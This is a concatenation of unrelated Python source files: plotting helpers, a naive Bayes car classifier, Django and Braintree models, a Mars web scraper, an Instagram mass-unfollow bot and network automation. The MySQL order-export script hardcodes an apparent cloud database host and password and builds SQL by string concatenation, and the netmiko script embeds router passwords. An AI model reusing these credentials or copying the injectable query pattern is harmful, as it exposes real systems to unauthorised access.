ax (matplotlib.axes.AxesSubplot)
"""
_ = ax.spines['top'].set_visible(False)
_ = ax.spines['right'].set_visible(False)
_ = ax.set_xticks(np.arange(0, .95, .2))
_ = ax.set_yticks(np.arange(0, .95, .2))
_ = ax.set_xlabel('Nuclear RFP level')
_ = ax.set_ylabel('Nuclear GFP level')
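# Usage sketch (assumes a pandas DataFrame with 'r' and 'g' columns of
# normalized fluorescence levels; the data values are illustrative):
#
#   import pandas as pd
#   data = pd.DataFrame({'r': [0.1, 0.4, 0.7], 'g': [0.2, 0.5, 0.6]})
#   fig = BackgroundCorrelation(data, name='background')
#   fig.save()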
|
# Author: Jaemin Jo <jmjo@hcil.snu.ac.kr>
import numpy as np
from pynene import Index
class KNNKernelDensity():
SQRT2PI = np.sqrt(2 * np.pi)
def __init__(self, X, online=False):
self.X = X
self.index = Index(X, w=(0.8, 0.2), reconstruction_weight=5)
if not online: # if offline
self.index.add_points(len(X))
def run(self, ops):
return self.index.run(ops)
def score_samples(self, X, k=10, bandwidth=0.2):
_, dists = self.index.knn_search_points(X, k=k)
scores = self._gaussian_score(dists, bandwidth) / k
return scores
def _gaussian_score(self, dists, bandwidth):
logg = -0.5 * (dists / bandwidth) ** 2
g = np.exp(logg) / bandwidth / self.SQRT2PI
return g.sum(axis=1)
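# Usage sketch (assumes pynene is installed; the shapes and parameters are
# illustrative):
#
#   import numpy as np
#   X = np.random.rand(1000, 2).astype(np.float32)
#   kde = KNNKernelDensity(X)
#   scores = kde.score_samples(np.random.rand(5, 2).astype(np.float32),
#                              k=10, bandwidth=0.2)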
|
from instapy import InstaPy
session = InstaPy(username='XXXXXXX', password='XXXXXXX',
headless_browser=False)
session.login()
session.unfollow_users(amount=1000,
allFollowing=True,
unfollow_after=0,
sleep_delay=601)
session.end()
|
# -*- coding:utf-8 -*-
# @Time : 2020/7/29
# @Author : Stephev
# @Site :
# @File : Payment.py
# @Software:
import pymysql
import csv
import datetime
#D:\workpalce\csv_file
now_time_r = datetime.datetime.now()
now_time = datetime.datetime.strftime(now_time_r,'%Y-%m-%d_%H_%M')
class cnMySQL:
def __init__(self):
self._dbhost = 'rm-bp1h051g0br862eswfo.mysql.rds.aliyuncs.com'
self._dbuser = 'python_dba'
self._dbpassword = 'Python_dba1'
self._dbname = 'uat_order'
self._dbcharset = 'utf8'
self._dbport = int(3306)
self._conn = self.connectMySQL()
if (self._conn):
self._cursor = self._conn.cursor(cursor=pymysql.cursors.DictCursor)
def connectMySQL(self):
try:
conn = pymysql.connect(host=self._dbhost,
user=self._dbuser,
passwd=self._dbpassword,
db=self._dbname,
port=self._dbport,
cursorclass=pymysql.cursors.DictCursor,
charset=self._dbcharset)
        except Exception:
            print("Database connection error")
            conn = False
return conn
    def close(self):
        if self._conn:
            try:
                if self._cursor:
                    self._cursor.close()
                self._conn.close()
            except Exception:
                print("Error while closing the database connection")
def ExecQuery(self,sql):
"""
        Execute a query statement.
"""
res = ''
if (self._conn):
try:
self._cursor.execute(sql)
res = self._cursor.fetchall()
except Exception:
res = False
print("查询异常")
self.close()
return res
def noForward():
"""
    Write out orders that have not yet been forwarded.
"""
conn = cnMySQL()
no_forward = "select b.purchase_order_no 订单编号,\
case b.status\
when '2' then '待付款'\
when '3' then '待审核'\
when '4' then '审核失败'\
when '6' then '代发货'\
when '7' then '调货中'\
when '8' then '待收货'\
when '9' then '完成'\
when '10' then '已取消'\
else '其他' end as 订单状态,\
b.submit_time 订单提交时间,\
case b.target_type\
when '1' then '总部'\
when '2' then '代理'\
else '其他' end as 出货人类型,\
b.transfer_to 总部订单号,\
c.title 商品名称,\
c.goods_id 商品id,\
c.sku_desc 商品描述,\
c.sku_id skuid,\
c.num 单品购买数量,\
c.price 进货单价,\
c.total_fee 总金额,\
b.payment 实际付款总额,\
c.post_fee 运费,\
a.NAME 代理姓名,\
a.auth_code 授权码,\
case a.level_id\
when '1' then '分公司'\
when '2' then '合伙人'\
when '3' then '官方'\
when '4' then '省代'\
when '5' then '市代'\
when '6' then '会员'\
else '其他' end as 代理等级,\
a.id 买家id,\
case a.region_id\
when '1' then '笛梦大区'\
when '2' then '环球大区'\
when '3' then '辉煌大区'\
when '4' then '聚米大区'\
when '5' then '聚星大区'\
when '6' then '口口大区'\
when '7' then '米苏大区'\
when '8' then '野狼大区'\
when '9' then '海纳百川大区'\
when '10' then '红红大区'\
when '11' then '熊熊大区'\
when '12' then '飞越大区'\
when '13' then '测试大区'\
else '其他' end as 进货人所属大区\
from uat_user.renren_distributor a,\
uat_order.rupt_purchase_order b,\
uat_order.rupt_purchase_order_item c\
where a.id = b.source_id and b.purchase_order_no = c.purchase_order_no and b.pay_type = 2 and b.submit_time >= '2020-07-28 00:00:00' and b.is_transfer = 0;"
noresult = conn.ExecQuery(no_forward)
print(noresult)
noforward_csv = "D:\\workpalce\\csv_file\\"+now_time+".csv"
headers = ['订单编号','订单状态','订单提交时间','出货人类型','总部订单号','商品名称','商品id','商品描述','skuid','单品购买数量','进货单价','总金额',\
'实际付款总额','运费','代理姓名','授权码','代理等级','买家id','进货人所属大区']
with open(noforward_csv,'w',newline='') as f:
f_csv = csv.DictWriter(f,headers)
f_csv.writeheader()
f_csv.writerows(noresult)
return
def isForward():
"""
    For forwarded orders, look up their headquarters order numbers.
"""
rows = []
conn = cnMySQL()
no_forward = "select b.purchase_order_no 订单编号,\
case b.status\
when '2' then '待付款'\
when '3' then '待审核'\
when '4' then '审核失败'\
when '6' then '代发货'\
when '7' then '调货中'\
when '8' then '待收货'\
when '9' then '完成'\
when '10' then '已取消'\
else '其他' end as 订单状态,\
b.submit_time 订单提交时间,\
case b.target_type\
when '1' then '总部'\
when '2' then '代理'\
else '其他' end as 出货人类型,\
b.transfer_to 总部订单号,\
c.title 商品名称,\
c.goods_id 商品id,\
c.sku_desc 商品描述,\
c.sku_id skuid,\
c.num 单品购买数量,\
c.price 进货单价,\
c.total_fee 总金额,\
b.payment 实际付款总额,\
c.post_fee 运费,\
a.NAME 代理姓名,\
a.auth_code 授权码,\
case a.level_id\
when '1' then '分公司'\
when '2' then '合伙人'\
when '3' then '官方'\
when '4' then '省代'\
when '5' then '市代'\
when '6' then '会员'\
else '其他' end as 代理等级,\
a.id 买家id,\
case a.region_id\
when '1' then '笛梦大区'\
when '2' then '环球大区'\
when '3' then '辉煌大区'\
when '4' then '聚米大区'\
when '5' then '聚星大区'\
when '6' then '口口大区'\
when '7' then '米苏大区'\
when '8' then '野狼大区'\
when '9' then '海纳百川大区'\
when '10' then '红红大区'\
when '11' then '熊熊大区'\
when '12' then '飞越大区'\
when '13' then '测试大区'\
else '其他' end as 进货人所属大区\
from uat_user.renren_distributor a,\
uat_order.rupt_purchase_order b,\
uat_order.rupt_purchase_order_item c\
where a.id = b.source_id and b.purchase_order_no = c.purchase_order_no and b.pay_type = 2 and b.submit_time >= '2020-07-28 00:00:00' and b.is_transfer = 0;"
noresult = conn.ExecQuery(no_forward)
for i in noresult:
rows.append(i)
is_forward = "select b.purchase_order_no 订单编号,\
case b.status\
when '2' then '待付款'\
when '3' then '待审核'\
when '4' then '审核失败'\
when '6' then '代发货'\
when '7' then '调货中'\
when '8' then '待收货'\
when '9' then '完成'\
when '10' then '已取消'\
else '其他' end as 订单状态,\
b.submit_time 订单提交时间,\
case b.target_type \
when '1' then '总部' \
when '2' then '代理'\
else '其他' end as 出货人类型,\
b.transfer_to 总部订单号,\
c.title 商品名称,\
c.goods_id 商品id,\
c.sku_desc 商品描述,\
c.sku_id skuid,\
c.num 单品购买数量,\
c.price 进货单价,\
c.total_fee 总金额,\
b.payment 实际付款总额,\
c.post_fee 运费,\
a.NAME 代理姓名,\
a.auth_code 授权码,\
case a.level_id\
when '1' then '分公司'\
when '2' then '合伙人'\
when '3' then '官方'\
when '4' then '省代'\
when '5' then '市代'\
when '6' then '会员'\
else '其他' end as 代理等级,\
a.id 买家id,\
case a.region_id\
when '1' then '笛梦大区'\
when '2' then '环球大区'\
when '3' then '辉煌大区'\
when '4' then '聚米大区'\
when '5' then '聚星大区'\
when '6' then '口口大区'\
when '7' then '米苏大区'\
when '8' then '野狼大区'\
when '9' then '海纳百川大区'\
when '10' then '红红大区'\
when '11' then '熊熊大区'\
when '12' then '飞越大区'\
when '13' then '测试大区'\
else '其他' end as 进货人所属大区\
from \
uat_user.renren_distributor a,\
uat_order.rupt_purchase_order b,\
uat_order.rupt_purchase_order_item c\
where a.id = b.source_id \
and b.purchase_order_no = c.purchase_order_no \
and b.pay_type = 2 and b.submit_time >= '2020-07-28 00:00:00' and b.target_type = 2 and b.is_transfer = 1"
isresult = conn.ExecQuery(is_forward)
for i in isresult:
up1_level = i['总部订单号']
print(up1_level)
check_sql = "select purchase_order_no,target_type,transfer_to from uat_order.rupt_purchase_order where purchase_order_no = \'"+up1_level+"\'"
check_result = conn.ExecQuery(check_sql)
print(check_result)
        up1_targettype = check_result[0]['target_type']
        if up1_targettype == 1:
            rows.append(i)
            continue
        # follow the chain of forwarded orders until one whose target is
        # headquarters (target_type == 1) is found
        while up1_targettype == 2:
            check_sql_1 = "select target_type,transfer_to from uat_order.rupt_purchase_order where purchase_order_no = \'"+up1_level+"\'"
            check_result_1 = conn.ExecQuery(check_sql_1)
            # ExecQuery returns a list of dict rows, so take the first row
            up1_level = check_result_1[0]['transfer_to']
            up1_targettype = check_result_1[0]['target_type']
            if up1_targettype == 1:
                i['总部订单号'] = up1_level
                rows.append(i)
                break
isforward_csv = "D:\\workpalce\\csv_file\\"+now_time+".csv"
headers = ['订单编号','订单状态','订单提交时间','出货人类型','总部订单号','商品名称','商品id','商品描述','skuid','单品购买数量','进货单价','总金额',\
'实际付款总额','运费','代理姓名','授权码','代理等级','买家id','进货人所属大区']
with open(isforward_csv,'w',newline='') as f:
f_csv = csv.DictWriter(f,headers)
f_csv.writeheader()
f_csv.writerows(rows)
return
def main():
#noForward()
isForward()
return
if __name__ == '__main__':
main() |
from abc import abstractmethod
class Detector(object):
def __init__(self, data_train, data_test, labels_train, extra_parameter):
assert len(data_train) == len(labels_train), "Mismatch size"
self.data_train = data_train
self.data_test = data_test
self.labels_train = labels_train
self.extra_parameter = extra_parameter
@abstractmethod
def test_detector(self):
raise NotImplementedError("Not implemented test_detector method for detector")
@abstractmethod
def extract_features(self):
raise NotImplementedError("Not implemented extract_features method for detector") |
#!/usr/bin/python
from matplotlib import pyplot
if __name__ == '__main__':
with open('walk-record.txt') as f:
lines = f.readlines()
score = [float(k) for k in [_[:-1].split(',')[-1] for _ in lines]]
pyplot.plot(score, '.')
    pyplot.title('walk score over tries')
    pyplot.xlabel('tries')
    pyplot.ylabel('walk distance')
best = [max(score[:i+1]) for i, e in enumerate(score)]
pyplot.plot(best, 'r')
pyplot.savefig('scores.png')
pyplot.show()
|
APPINFO_JSON = {u'sdkVersion': u'3', u'uuid': u'b3578af5-8a89-4a1d-9437-060a0b481c9e', u'appKeys': {u'AppKeyReady': 0, u'AppKeyUrl': 2}, u'companyName': u'Andrea Cerra', u'enableMultiJS': True, u'versionLabel': u'1.0', u'targetPlatforms': [u'aplite', u'basalt', u'chalk'], u'longName': u'PebbleHttp List', u'shortName': u'PebbleHttp List', u'watchapp': {u'watchface': False}, u'resources': {u'media': []}}
BINDIR = '/usr/local/bin'
DEFINES = ['RELEASE']
LIBDIR = '/usr/local/lib'
PBW_NAME = 'Pebble.pbw'
PEBBLE_SDK_COMMON = '/Users/Andrea/Library/Application Support/Pebble SDK/SDKs/current/sdk-core/pebble/common'
PEBBLE_SDK_ROOT = '/Users/Andrea/Library/Application Support/Pebble SDK/SDKs/current/sdk-core/pebble'
PREFIX = '/usr/local'
RESOURCES_JSON = []
TARGET_PLATFORMS = ['chalk', 'basalt', 'aplite']
TIMESTAMP = 1465050134
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
{
'name': "SO - Product Price Check",
'version': '10.0.1.0.0',
'category': 'Sales Management',
'description': """
This module restricts a user from confirming a Sale Order/Quotation
if it contains products having sale price zero.
""",
'license': 'AGPL-3',
'author': "Serpent Consulting Services Pvt. Ltd.",
'website': 'http://www.serpentcs.com',
'depends': ['sale'],
'images': ['static/description/PriceCheck.png'],
'installable': True,
'auto_install': False,
}
|
class Solution:
def twoSum(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: List[int]
"""
        for i in range(len(nums)):
            for j in range(i + 1, len(nums)):
                if nums[i] + nums[j] == target:
                    return [i, j]
def main():
print(Solution().twoSum([2, 7, 11, 15], 9))
print(Solution().twoSum((-3, 4, 3, 90), 0))
if __name__ == "__main__":
main()
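# For reference, a single-pass O(n) alternative to the O(n^2) double loop
# above, using a dict of previously seen values (not part of the original):
#
#   def two_sum_hashmap(nums, target):
#       seen = {}
#       for i, n in enumerate(nums):
#           if target - n in seen:
#               return [seen[target - n], i]
#           seen[n] = i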
|
from definitions import PIS_OUTPUT_INTERACTIONS
import logging
import json
import requests
import gzip
import pandas as pd
import re
from io import BytesIO
from .DownloadResource import DownloadResource
import python_jsonschema_objects as pjo
from .common import replace_suffix
logger = logging.getLogger(__name__)
class StringInteractions(object):
"""
main interface of the StringInteractions module.
* Manages the flow of accessing data from various sources + mapping
    * Manages the formatting of the resulting data, accommodating the JSON schema
"""
def __init__(self, yaml_dict):
self.download = DownloadResource(PIS_OUTPUT_INTERACTIONS)
self.gs_output_dir = yaml_dict.gs_output_dir
self.output_folder = PIS_OUTPUT_INTERACTIONS
self.yaml = yaml_dict
self.string_url = yaml_dict.string_info.uri
self.string_info = yaml_dict.string_info
self.ensembl_gtf_url = yaml_dict.string_info.additional_resouces.ensembl_ftp
self.network_json_schema_url = yaml_dict.string_info.additional_resouces.network_json_schema.url
self.output_string = yaml_dict.string_info.output_string
self.output_protein_mapping = yaml_dict.string_info.additional_resouces.ensembl_ftp.output_protein_mapping
self.list_files_downloaded = {}
def getStringResources(self):
# Fetch string network data and generate evidence json:
ensembl_protein_mapping = self.get_ensembl_protein_mapping()
self.list_files_downloaded[ensembl_protein_mapping] = {'resource': self.ensembl_gtf_url.resource,
'gs_output_dir': self.gs_output_dir }
string_file = self.download.execute_download(self.string_info)
self.list_files_downloaded[string_file] = {'resource': self.yaml.string_info.resource,
'gs_output_dir': self.gs_output_dir }
return self.list_files_downloaded
def get_ensembl_protein_mapping(self):
ensembl_file = self.download.ftp_download(self.ensembl_gtf_url)
return ensembl_file
|
# -*- coding: utf-8 -*-
"""
Created on Sat Dec 22 21:10:18 2018
@author: Gehad
"""
import pandas as pd
from itertools import combinations
def calc_p_class(trainingData,Class):
count=0
for i in range(0,len(trainingData)):
for j in range(0,7):
if trainingData[i][j]==Class:
count=count+1
prop=count/len(trainingData)
return prop
def calc_p_feature_class(trainingData,Class,feature,fno):
count=0
counter=1
for i in range(0,len(trainingData)):
for j in range(0,7):
if trainingData[i][j]==Class:
count=count+1
if trainingData[i][j]==Class and trainingData[i][fno]==feature:
counter=counter+1
prop=counter/count
return prop
def calssifier(trainingData,test):
p_unacc=calc_p_class(trainingData,'unacc')
p_acc=calc_p_class(trainingData,'acc')
p_good=calc_p_class(trainingData,'good')
p_vgood=calc_p_class(trainingData,'vgood')
cls=[p_unacc,p_acc,p_good,p_vgood]
#print(p_unacc)
#print(p_acc)
#print(p_good)
#print(p_vgood)
classes=['unacc', 'acc', 'good', 'vgood']
feature1=['vhigh', 'high', 'med', 'low']
feature2=['vhigh', 'high', 'med', 'low']
feature3=['2','3', '4', '5more']
feature4=['2','4','more']
feature5=['small', 'med', 'big']
feature6=['low', 'med', 'high']
#price feature fno=0
p_price=[]
#print("price feature")
for c in classes:
for f in feature1:
#print(c,f)
p_price.append((c,f,calc_p_feature_class(trainingData,c,f,0)))
#mprice feature fno=1
p_mprice=[]
#print("mantience price feature")
for c in classes:
for f in feature2:
#print(c,f)
p_mprice.append((c,f,calc_p_feature_class(trainingData,c,f,1)))
#no. of doors feature fno=2
p_doorsnum=[]
#print("no. of doors feature")
for c in classes:
for f in feature3:
#print(c,f)
p_doorsnum.append((c,f,calc_p_feature_class(trainingData,c,f,2)))
#Capacity in terms of persons to carry fno=3
p_capacity=[]
#print("Capacity in terms of persons to carry")
for c in classes:
for f in feature4:
#print(c,f)
p_capacity.append((c,f,calc_p_feature_class(trainingData,c,f,3)))
#the size of luggage boot
p_lug=[]
#print("the size of luggage boot")
for c in classes:
for f in feature5:
#print(c,f)
p_lug.append((c,f,calc_p_feature_class(trainingData,c,f,4)))
#Estimated safety of the car
p_safty=[]
#print("Estimated safety of the car")
for c in classes:
for f in feature6:
#print(c,f)
p_safty.append((c,f,calc_p_feature_class(trainingData,c,f,5)))
#print(p_price)
#print(p_mprice)
#print(p_doorsnum)
#print(p_capacity)
#print(p_lug)
#print(p_safty)
#TESTING
p_props=[]
for c in classes:
for x,y,z in p_price:
if x==c and y==test[0]:
p_props.append(z)
#print(p_props)
mp_props=[]
for c in classes:
for x,y,z in p_mprice:
if x==c and y==test[1]:
mp_props.append(z)
#print(mp_props)
d_props=[]
for c in classes:
for x,y,z in p_doorsnum:
if x==c and y==test[2]:
d_props.append(z)
#print(d_props)
c_props=[]
for c in classes:
for x,y,z in p_capacity:
if x==c and y==test[3]:
c_props.append(z)
#print(c_props)
l_props=[]
for c in classes:
for x,y,z in p_lug:
if x==c and y==test[4]:
l_props.append(z)
#print(l_props)
s_props=[]
for c in classes:
for x,y,z in p_safty:
if x==c and y==test[5]:
s_props.append(z)
#print(s_props)
res=[]
for i in range(0,4):
r=cls[i]*p_props[i]*mp_props[i]*d_props[i]*c_props[i]*l_props[i]*s_props[i]
res.append(r)
#print(res)
res_cls=(res.index(max(res)))
return classes[res_cls]
def calc_accurcy(test,orgTest):
count=0
for i in range (0,len(test)):
if test[i][6]==orgTest[i][6]:
count=count+1
return (count/len(orgTest))*100
def main():
    # load the dataset and split it
trainingData=list()
testData=list()
dataSet=pd.read_csv("car.data.csv")
dataSetLen=len(dataSet)
trainingDataSize=int(.75*dataSetLen)
for i in range(0,trainingDataSize):
trainingData.append([dataSet.values[i,j] for j in range(0,7)])
for i in range (trainingDataSize,dataSetLen):
testData.append([dataSet.values[i,j] for j in range(0,6)])
#call classifier
for test_tuple in testData:
cls=calssifier(trainingData,test_tuple)
test_tuple.append(cls)
print(testData)
    # calc accuracy
originalTest=[]
for i in range (trainingDataSize,dataSetLen):
originalTest.append([dataSet.values[i,j] for j in range(0,7)])
accurcy=calc_accurcy(testData,originalTest)
print("Classifier accurcy:",round(accurcy,2),"%")
if __name__ =='__main__':
main()
|
from netmiko import ConnectHandler
from netmiko.ssh_exception import NetMikoTimeoutException
from netmiko.ssh_exception import AuthenticationException
from paramiko.ssh_exception import SSHException
import sys
host1 = {
'device_type': 'cisco_ios',
'ip': '10.4.0.17',
'username': 'Admin',
'password': 'NterOne1!',
}
host2 = {
'device_type': 'cisco_ios',
'ip': '10.4.1.1',
'username': 'Admin',
'password': 'NterOne1!',
}
host3 = {
'device_type': 'cisco_ios',
'ip': '10.4.3.1',
'username': 'Admin',
'password': 'NterOne1!',
}
#routers =[host1, host2, host3]
routers =[host3]
for target in routers:
try:
net_connect = ConnectHandler(**target)
print(target)
except (AuthenticationException):
print ('\n' + "*"*80)
print ('Authentication Failure: ' + str(target))
print ("*"*80)
continue
except (NetMikoTimeoutException):
print ('\n' + "*"*80)
print ('Timeout to device: ' + str(target))
print ("*"*80)
continue
except (SSHException):
print ('\n' + "*"*80)
print ('SSH might not be enabled: ' + str(target))
print ("*"*80)
continue
except (EOFError):
print ('\n' + "*"*80)
print ('End of attempting device: ' + str(target))
print ("*"*80)
continue
    except Exception:
        print('Some other error: ' + str(target) + str(sys.exc_info()))
        continue
loopback11 = "11.4."+target['ip'].split('.')[2]+'.1'
loopbackcmd = 'ip address '+ loopback11+ ' 255.255.255.0'
config_commands = ['int loop 11', loopbackcmd]
output = net_connect.send_config_set(config_commands)
print (output)
print ("-"*20)
output = net_connect.send_command('show ip int brief')
print (output)
print ("="*80)
net_connect.disconnect()
|
import os
import re
import logging
from lxml import etree
from blogilainen.plugins import BasePlugin
class Plugin(BasePlugin):
def run(self, source, resource):
target_meta = etree.Element('target-meta')
for ext,t in source.targets.iteritems():
target = etree.Element('target', type=ext)
# make sure out path is separated by '/'
out_path = re.sub(os.sep, '/', t.relative_path)
target.append(etree.Element('meta', name='out-path', content=out_path))
target.append(etree.Element('meta', name='basename', content=t.basename))
target.append(etree.Element('meta', name='ext', content=t.ext))
target.append(etree.Element('meta', name='out-file', content=t.out_file))
target.append(etree.Element('meta', name='out', content=t.out_url))
target_meta.append(target)
resource.append(target_meta)
return resource
|
# -*- coding: utf-8 -*-
from django.db import models
from django.conf import settings
from django.core.urlresolvers import reverse_lazy
class Entry(models.Model):
name = models.CharField(verbose_name=u'Заголовок', max_length=255)
date_create = models.DateTimeField(verbose_name=u'Дата создания',
auto_now_add=True)
description = models.TextField(verbose_name=u'Описание')
text = models.TextField(verbose_name=u'Текст')
user = models.ForeignKey(settings.AUTH_USER_MODEL)
class Meta:
app_label = 'blog'
ordering = ['-date_create']
verbose_name = u'Запись блога'
verbose_name_plural = u'Записи блога'
def __unicode__(self):
return self.name
def get_absolute_url(self):
return reverse_lazy('blog:entry', kwargs={'pk': self.id})
class UserFeed(models.Model):
    # A user's subscription to another user
user = models.ForeignKey(settings.AUTH_USER_MODEL,
verbose_name=u'Кто подписан',
related_name='user_feed')
feed = models.ForeignKey(settings.AUTH_USER_MODEL,
verbose_name=u'На кого подписан',
related_name='user_readers')
class Meta:
app_label = 'blog'
unique_together = (('user', 'feed'),)
class ReadEntry(models.Model):
    # Posts the user has read
user = models.ForeignKey(settings.AUTH_USER_MODEL)
autor = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='autor')
entry = models.ForeignKey(Entry)
class Meta:
app_label = 'blog'
unique_together = (('user', 'entry'),)
|
"""
ASGI entrypoint. Configures Django and then runs the application
defined in the ASGI_APPLICATION setting.
"""
import os
# Fetch Django ASGI application early to ensure AppRegistry is populated
# before importing consumers and AuthMiddlewareStack that may import ORM
# models.
from django.core.asgi import get_asgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "daphne_brain.settings")
django_asgi_app = get_asgi_application()
from channels.auth import AuthMiddlewareStack
from channels.routing import ProtocolTypeRouter, URLRouter
from daphne_brain.routing import ws_routes
application = ProtocolTypeRouter({
"http": django_asgi_app,
"websocket": AuthMiddlewareStack(
URLRouter(ws_routes),
),
})
|
# -*- coding: cp936 -*-
# Introductory case study: Boston housing prices
# %matplotlib inline
import matplotlib.pyplot as plt
from sklearn import datasets
from sklearn.feature_selection import SelectKBest,f_regression
from sklearn.linear_model import LinearRegression
from sklearn.svm import SVR
from sklearn.ensemble import RandomForestRegressor
boston_dataset = datasets.load_boston()
X_full = boston_dataset.data
Y = boston_dataset.target
print(X_full.shape) # (506, 13)
print(Y.shape) # (506,)
print(boston_dataset.DESCR)
# Feature selection
selector = SelectKBest(f_regression,k=1)
selector.fit(X_full,Y)
X = X_full[:,selector.get_support()]
print(X.shape) # (506, 1)
plt.scatter(X,Y,color='black')
plt.show()
# Linear regression
regressor = LinearRegression(normalize=True)
regressor.fit(X,Y)
plt.scatter(X,Y,color='black')
plt.plot(X,regressor.predict(X),color='red',linewidth=3)
plt.show()
# SVM
regressor = SVR()
regressor.fit(X,Y)
plt.scatter(X,Y,color='black')
plt.scatter(X,regressor.predict(X),color='red',linewidth=3)
plt.show()
# Random Forest regression
regressor = RandomForestRegressor()
regressor.fit(X,Y)
plt.scatter(X,Y,color='black')
plt.scatter(X,regressor.predict(X),color='red',linewidth=3)
plt.show() |
# Dependencies
from bs4 import BeautifulSoup
import requests
from splinter import Browser
from selenium import webdriver
import pandas as pd
import time
def init_browser():
executable_path = {"executable_path": "/usr/local/bin/chromedriver"}
return Browser("chrome", **executable_path, headless=False)
def scrape():
browser = init_browser()
# Create a dictionary to store the datas
mars_dict = {}
#### NASA MARS NEWS ####
news_url = 'https://mars.nasa.gov/news/'
browser.visit(news_url)
news_html = browser.html
news_soup = BeautifulSoup(news_html, 'lxml')
news_title = news_soup.find("div", class_= "content_title").text
news_paragraph = news_soup.find("div", class_ = "article_teaser_body").text
mars_dict['news_title'] = news_title
mars_dict['news_paragraph'] = news_paragraph
#### JPL MARS SPACE IMAGES ####
image_url = "https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars"
browser.visit(image_url)
browser.click_link_by_partial_text('FULL IMAGE')
time.sleep(2)
browser.click_link_by_partial_text('more info')
image_html = browser.html
image_soup = BeautifulSoup(image_html,'lxml')
jpl_image = image_soup.find('figure', class_='lede').a['href']
featured_image_url = (f'https://www.jpl.nasa.gov{jpl_image}')
mars_dict['featured_image_url'] = featured_image_url
#### MARS WEATHER ####
tweet_weather_url = 'https://twitter.com/marswxreport?lang=en'
browser.visit(tweet_weather_url)
tweet_html = browser.html
weather_soup = BeautifulSoup(tweet_html, 'lxml')
latest_weather = weather_soup.find('div', class_= 'js-tweet-text-container')
mars_weather = latest_weather.find('p', class_= 'TweetTextSize').text
mars_dict['mars_weather'] = mars_weather
#### MARS FACTS ####
mars_fact_url = 'https://space-facts.com/mars'
browser.visit(mars_fact_url)
mars_fact_html = browser.html
mars_soup = BeautifulSoup(mars_fact_html, 'lxml')
tables = pd.read_html(mars_fact_url)
mars_fact_df = tables[1]
    mars_final_df = mars_fact_df.rename(columns={0: "Parameters", 1: "Values"})
    mars_final_df = mars_final_df.to_html(header=False, index=False)
    mars_final_df = mars_final_df.replace('\n', '')
mars_dict['mars_final_df'] = mars_final_df
#### MARS HEMISHPERES ####
hemisphere_url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'
browser.visit(hemisphere_url)
hemisphere_html = browser.html
hemisphere_soup = BeautifulSoup(hemisphere_html, 'lxml')
base_url ="https://astrogeology.usgs.gov"
image_list = hemisphere_soup.find_all('div', class_='item')
# Create list to store dictionaries of data
hemisphere_image_urls = []
# Loop through each hemisphere and click on link to find large resolution image url
for image in image_list:
hemisphere_dict = {}
href = image.find('a', class_='itemLink product-item')
link = base_url + href['href']
browser.visit(link)
time.sleep(2)
hemisphere_html2 = browser.html
hemisphere_soup2 = BeautifulSoup(hemisphere_html2, 'lxml')
img_title = hemisphere_soup2.find('div', class_='content').find('h2', class_='title').text
hemisphere_dict['title'] = img_title
img_url = hemisphere_soup2.find('div', class_='downloads').find('a')['href']
hemisphere_dict['url_img'] = img_url
# Append dictionary to list
hemisphere_image_urls.append(hemisphere_dict)
mars_dict['hemisphere_image_urls'] = hemisphere_image_urls
return mars_dict
|
import random
def calcBayes(priorA, probBifA, probB):
"""priorA:A独立于B时的初始概率估计值
probBifA:A为真时,B的概率估计值
probB:B的概率估计值
返回priorA*probBifA/probB"""
return priorA*probBifA/probB
# priorA = 1/3
priorA = 0.9
prob6ifA = 1/5
prob6 = (1/5 + 1/6 + 1/7)/3
# postA = calcBayes(priorA, prob6ifA, prob6)
# print('Probability of type A =', round(postA, 4))
# postA = calcBayes(postA, prob6ifA, prob6)
# print('Probability of type A =', round(postA, 4))
# postA = calcBayes(priorA, 1 - prob6ifA, 1 - prob6)
# print('Probability of type A =', round(postA, 4))
# postA = calcBayes(postA, 1 - prob6ifA, 1 - prob6)
# print('Probability of type A =', round(postA, 4))
numRolls = 200
postA = priorA
for i in range(numRolls+1):
if i%(numRolls//10) == 0:
print('After', i, 'rolls. Probability of type A =',
round(postA, 4))
isSix = random.random() <= 1/7 #because die of type C
if isSix:
postA = calcBayes(postA, prob6ifA, prob6)
else:
postA = calcBayes(postA, 1 - prob6ifA, 1 - prob6) |
from sardana.macroserver.macro import Macro, macro, Type
@macro()
def altOn(self):
"""Macro altOn"""
acqConf = self.getEnv('acqConf')
acqConf['altOn'] = True
self.setEnv('acqConf', acqConf)
self.info('switching altOn')
@macro()
def altOff(self):
"""Macro altOff"""
acqConf = self.getEnv('acqConf')
acqConf['altOn'] = False
self.setEnv('acqConf', acqConf)
self.info('switching altOff')
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import traceback
from .auth import braintree
from .managers import CustomerManager
# from .tasks import send_funds
from model_utils.models import TimeStampedModel
from delorean import Delorean
from jsonfield.fields import JSONField
from django.conf import settings
from django.utils.encoding import python_2_unicode_compatible
from django.utils import timezone
from django.db import models
from django_extensions.db.fields.encrypted import EncryptedCharField
# def dwolla_charge(sub):
# # Clear out any previous session
# DWOLLA_GATE.start_gateway_session()
# # Add a product to the purchase order
# # DWOLLA_GATE.add_gateway_product(str(sub.customer), float(sub.amount))
# DWOLLA_GATE.add_gateway_product('Devote.io subscription', 21.00)
# # Generate a checkout URL; pass in the recipient's Dwolla ID
# # url = DWOLLA_GATE.get_gateway_URL(str(sub.customer))
# url = DWOLLA_GATE.get_gateway_URL(DWOLLA_ACCOUNT['user_id'])
# return url
# def create_oauth_request_url():
# """ Send users to this url to authorize us """
# redirect_uri = "https://www.back2ursite.com/return"
# scope = "send|balance|funding|transactions|accountinfofull"
# authUrl = DWOLLA_APP.init_oauth_url(redirect_uri, scope)
# return authUrl
class BraintreeObject(TimeStampedModel):
braintree_id = models.CharField(max_length=50)
class Meta:
abstract = True
@python_2_unicode_compatible
class Customer(BraintreeObject):
user = models.OneToOneField(getattr(settings, 'AUTH_USER_MODEL', 'auth.User'),
null=True, related_name='bt_customer')
token = models.CharField(max_length=100, null=True, blank=True)
refresh_token = models.CharField(max_length=100, null=True, blank=True)
pin = EncryptedCharField(max_length=100, null=True, blank=True)
funds_source = models.CharField(max_length=50, blank=True, null=True)
card_fingerprint = models.CharField(max_length=200, blank=True)
card_last_4 = models.CharField(max_length=4, blank=True)
card_kind = models.CharField(max_length=50, blank=True)
